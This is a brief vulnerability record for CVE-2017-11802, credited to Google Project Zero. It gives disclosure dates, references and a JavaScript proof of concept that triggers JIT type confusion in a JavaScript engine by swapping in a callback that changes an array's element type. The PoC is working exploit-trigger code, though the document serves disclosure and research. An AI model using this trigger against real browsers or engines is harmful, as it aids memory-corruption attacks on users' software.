CVE-2017-11802.md

CVE-2017-11802

• Report: Aug 2017
• Fix: Oct 2017
• Credit: lokihardt of Google Project Zero

PoC

function main() {
    let arr = [1.1, 1.1, 1.1, 1.1, 1.1];
    function opt(f) {
        arr[0] = 1.1;
        arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
        arr[2] = 1.1;
        arr[3] = 1.1;
    }

    let r0 = () => '0';
    for (var i = 0; i < 0x1000; i++)
        opt(r0);

    opt(() => {
        arr[0] = {};
        return '0';
    });

    print(arr[1]);
}

main();

Reference

• Microsoft
• Google Project Zero
• Fix